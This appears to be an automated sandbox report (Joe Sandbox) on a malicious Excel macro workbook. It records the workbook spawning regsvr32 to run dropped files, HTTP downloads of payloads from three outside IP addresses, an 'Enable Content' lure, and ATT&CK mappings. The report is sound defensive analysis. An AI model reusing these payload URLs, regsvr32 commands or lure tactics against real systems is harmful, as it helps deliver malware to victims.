Loading ...

Play interactive tourEdit tour

Windows Analysis Report Permission-1532161794-06252021.xlsm

Overview

General Information

Sample Name:Permission-1532161794-06252021.xlsm
Analysis ID:440649
MD5:bff78ca6421651b824c41ff73cd63a4d
SHA1:8a439fe82292dfb61092daa32af6f0152400f002
SHA256:b4c8a880fae666add98f9a871210d75f7addd4a00a334fb758c791c5ad1d3711
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1144 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2740 cmdline: regsvr32 ..\Kro.fis MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2636 cmdline: regsvr32 ..\Kro.fis1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2924 cmdline: regsvr32 ..\Kro.fis2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1144, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 2740

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 190.14.37.3:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.240.103.219:80
Source: global trafficHTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D80F52D.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2146134146.0000000001C50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126766598.0000000001C20000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107504006.0000000001DB0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108101564.0000000003990000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing from the ' yellow bar above. 21 22 G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 4Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A EC DO I '0
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 8Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A 'g ,,J
Source: Document image extraction number: 0Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0Screenshot OCR: Enable Content
Source: Document image extraction number: 1Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Permission-1532161794-06252021.xlsmInitial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Permission-1532161794-06252021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC503.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fisJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Permission-1532161794-06252021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-1532161794-06252021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-1532161794-06252021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2944Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2384Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2452Thread sleep time: -60000s >= -30000sJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Permission-1532161794-06252021.xlsm5%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://190.14.37.3/44372.7671056713.dat0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://185.183.99.120/44372.7671056713.dat0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://190.14.37.3/44372.7671056713.datfalse
  • Avira URL Cloud: safe
unknown
http://185.183.99.120/44372.7671056713.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comregsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpfalse
              high
              http://www.%s.comPAregsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108101564.0000000003990000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              low
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmpfalse
                high
                http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2146134146.0000000001C50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126766598.0000000001C20000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107504006.0000000001DB0000.00000002.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                190.14.37.3
                unknownPanama
                52469OffshoreRacksSAPAfalse
                185.183.99.120
                unknownNetherlands
                60117HSAEfalse
                185.240.103.219
                unknownRussian Federation
                57724DDOS-GUARDRUfalse

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:440649
                Start date:25.06.2021
                Start time:18:24:20
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 0s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Permission-1532161794-06252021.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal64.expl.evad.winXLSM@7/7@0/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                18:24:50API Interceptor3x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                190.14.37.3Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.5879460648.dat
                185.183.99.120Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.5879460648.dat
                185.240.103.219Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219/44372.5879460648.dat

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                DDOS-GUARDRUPermission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                ForceNitro.exeGet hashmaliciousBrowse
                • 185.178.208.135
                PO#8076.exeGet hashmaliciousBrowse
                • 185.129.100.112
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                jebDtHCePK9feGL.exeGet hashmaliciousBrowse
                • 185.129.100.112
                EDS03932,pdf.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                12042021493876783,xlsx.exeGet hashmaliciousBrowse
                • 185.178.208.160
                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                • 5.253.61.31
                AxR7BY4wzz.exeGet hashmaliciousBrowse
                • 185.178.208.189
                SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                • 185.178.208.189
                #U041e#U0442#U043a#U0440#U044b#U0442#U044c www.sberbank.ru-0152 .htmGet hashmaliciousBrowse
                • 185.129.100.100
                Install.exeGet hashmaliciousBrowse
                • 185.219.40.40
                CHEAT.exeGet hashmaliciousBrowse
                • 185.178.208.161
                seed.exeGet hashmaliciousBrowse
                • 185.219.40.40
                OffshoreRacksSAPAPermission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 190.14.37.121
                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 190.14.37.121
                Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                HSAEPermission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
